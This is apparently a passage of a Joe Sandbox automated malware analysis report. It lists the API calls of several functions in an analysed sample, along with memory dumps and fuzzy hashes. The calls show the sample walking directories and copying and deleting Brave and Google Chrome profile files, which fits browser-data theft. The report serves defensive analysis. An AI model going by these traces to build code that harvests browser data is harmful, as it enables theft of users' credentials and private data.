                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006D1B8A
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1C03
                            • lstrlen.KERNEL32(00701794), ref: 006D1C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C31
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1C74
                            • lstrlen.KERNEL32(00701794), ref: 006D1C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CA2
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1CAE
                            • lstrlen.KERNEL32(?), ref: 006D1CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1CE9
                            • lstrlen.KERNEL32(00701794), ref: 006D1CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1D14
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1DEB
                            • lstrlen.KERNEL32(00701794), ref: 006D1DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E19
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D1E56
                            • lstrlen.KERNEL32(00701794), ref: 006D1E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1E81
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D1E8D
                            • lstrlen.KERNEL32(?), ref: 006D1E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006D1F45
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1F9F
                            • lstrlen.KERNEL32(010188F8), ref: 006D1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1FE3
                            • lstrlen.KERNEL32(00701794), ref: 006D1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D200E
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D204D
                            • lstrlen.KERNEL32(00701794), ref: 006D2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2075
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D2081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: db778462b66e4223e21e4982a0523fce3f529d57b3bdf05f1bfb4ff83fe9ebc8
                            • Instruction ID: 3bc270bddb38c65162cb9461953f99acb37a315c61e523a1a9795d99fb3ee760
                            • Opcode Fuzzy Hash: db778462b66e4223e21e4982a0523fce3f529d57b3bdf05f1bfb4ff83fe9ebc8
                            • Instruction Fuzzy Hash: 1992AE71E1521BAFCB61AF65DD98AEE77BAAF11300F04412AF805AB351DB74DD01CBA0
                            Function 006DDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDBEF
                            • lstrlen.KERNEL32(00704CA8), ref: 006DDBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC17
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006DDC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC4C
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDC8F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006DDCD0
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006DDCF0
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006DDD0A
                            • lstrlen.KERNEL32(006FCFEC), ref: 006DDD1D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDD7B
                            • lstrlen.KERNEL32(00701794), ref: 006DDD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDA3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDDAF
                            • lstrlen.KERNEL32(?), ref: 006DDDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 006DDDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDE19
                            • lstrlen.KERNEL32(00701794), ref: 006DDE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDE6F
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDE7B
                            • lstrlen.KERNEL32(01018B48), ref: 006DDE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDEBB
                            • lstrlen.KERNEL32(00701794), ref: 006DDEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDEE6
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDEF2
                            • lstrlen.KERNEL32(01018928), ref: 006DDF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFA5
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDFB1
                            • lstrlen.KERNEL32(01018B48), ref: 006DDFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDFF4
                            • lstrlen.KERNEL32(00701794), ref: 006DDFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE022
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DE02E
                            • lstrlen.KERNEL32(01018928), ref: 006DE03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DE06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 006DE0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 006DE0E7
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE11F
                            • lstrlen.KERNEL32(0101DE28), ref: 006DE12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE155
                            • lstrcat.KERNEL32(00000000,?), ref: 006DE15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE19F
                            • lstrcat.KERNEL32(00000000), ref: 006DE1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE1F9
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE22F
                            • lstrlen.KERNEL32(010188F8), ref: 006DE23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE261
                            • lstrcat.KERNEL32(00000000,010188F8), ref: 006DE269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 006DE274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 006DE2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE349
                            • DeleteFileA.KERNEL32(?), ref: 006DE381
                            • StrCmpCA.SHLWAPI(?,0101DD80), ref: 006DE3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE445
                            • StrCmpCA.SHLWAPI(?,01018928), ref: 006DE468
                            • StrCmpCA.SHLWAPI(?,01018B48), ref: 006DE47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006DE4E0
                            • StrCmpCA.SHLWAPI(?,0101DE40), ref: 006DE58E
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE639
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE678
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE737
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 006DE776
                            • DeleteFileA.KERNEL32(?), ref: 006DE7D2
                            • StrCmpCA.SHLWAPI(?,010189D8), ref: 006DE7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE916
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE952
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: e507b39d5e07eb7f04c7944263b4ed6c674104cdbcc807efe15a04ea0237ea95
                            • Instruction ID: be3e25d03cd073c80c0412d38852deb16acbad08e681df037878e72d3c9ed25e
                            • Opcode Fuzzy Hash: e507b39d5e07eb7f04c7944263b4ed6c674104cdbcc807efe15a04ea0237ea95
                            • Instruction Fuzzy Hash: 7B927CB1E1021A9FCB60AFB5DC99AAE77BAAF54300F04452AF845AB351DB34DC458B90
                            Function 006E18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E18D2
                            • lstrlen.KERNEL32(\*.*), ref: 006E18DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E18FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006E190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E1947
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E1967
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E1981
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E19BF
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E19F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A4C
                            • lstrlen.KERNEL32(00701794), ref: 006E1A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A80
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1AB4
                            • lstrlen.KERNEL32(?), ref: 006E1AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 006E1AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B19
                            • lstrlen.KERNEL32(010189E8), ref: 006E1B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B8F
                            • lstrlen.KERNEL32(00701794), ref: 006E1BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1BC3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1C57
                            • lstrlen.KERNEL32(00701794), ref: 006E1C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1C8B
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D21
                            • lstrlen.KERNEL32(00701794), ref: 006E1D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D55
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DED
                            • lstrlen.KERNEL32(00701794), ref: 006E1E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1E36
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1E68
                            • lstrlen.KERNEL32(0101DE58), ref: 006E1E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1EB2
                            • lstrlen.KERNEL32(00701794), ref: 006E1EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1EE3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1F15
                            • lstrlen.KERNEL32(0101E518), ref: 006E1F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1F5F
                            • lstrlen.KERNEL32(00701794), ref: 006E1F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1F90
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1FC2
                            • lstrlen.KERNEL32(0100A770), ref: 006E1FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2036
                            • lstrlen.KERNEL32(00701794), ref: 006E2048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2067
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E2073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2098
                            • lstrlen.KERNEL32(?), ref: 006E20AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E20D0
                            • lstrcat.KERNEL32(00000000,?), ref: 006E20DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2103
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E213F
                            • lstrlen.KERNEL32(0101DE28), ref: 006E214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2181
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: f4e4936a37799711f2fe448ad58be2df0df61984c7a922c6d49894672ee2e7b6
                            • Instruction ID: 3b8f97065025d01c32939d99a00a8ca209951ebc4b535664c416aee1410ac152
                            • Opcode Fuzzy Hash: f4e4936a37799711f2fe448ad58be2df0df61984c7a922c6d49894672ee2e7b6
                            • Instruction Fuzzy Hash: E562AE70A263179FCB21AB66CC58AEFB7BBAF51700F084129B8059B351DB34DD01DBA0
                            Function 006E3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006E392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 006E3943
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E396C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E3986
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E39BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E39E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E39F2
                            • lstrlen.KERNEL32(00701794), ref: 006E39FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3A1A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3A26
                            • lstrlen.KERNEL32(?), ref: 006E3A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3A53
                            • lstrcat.KERNEL32(00000000,?), ref: 006E3A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3A8A
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E3ACE
                            • lstrlen.KERNEL32(?), ref: 006E3AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B36
                            • lstrlen.KERNEL32(00701794), ref: 006E3B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B6A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B9E
                            • lstrlen.KERNEL32(?), ref: 006E3BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 006E3BE0
                            • lstrlen.KERNEL32(010188F8), ref: 006E3C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3C3C
                            • lstrlen.KERNEL32(010189E8), ref: 006E3C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3CB7
                            • lstrlen.KERNEL32(00701794), ref: 006E3CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3CE8
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3D79
                            • lstrlen.KERNEL32(00701794), ref: 006E3D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3DAD
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3E43
                            • lstrlen.KERNEL32(00701794), ref: 006E3E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3E77
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3F0D
                            • lstrlen.KERNEL32(00701794), ref: 006E3F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3F41
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3F75
                            • lstrlen.KERNEL32(?), ref: 006E3F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 006E3FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3FE0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E401F
                            • lstrlen.KERNEL32(0101DE28), ref: 006E402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E40CE
                            • lstrcat.KERNEL32(00000000), ref: 006E40DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006E42D9
                            • FindClose.KERNEL32(00000000), ref: 006E42E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
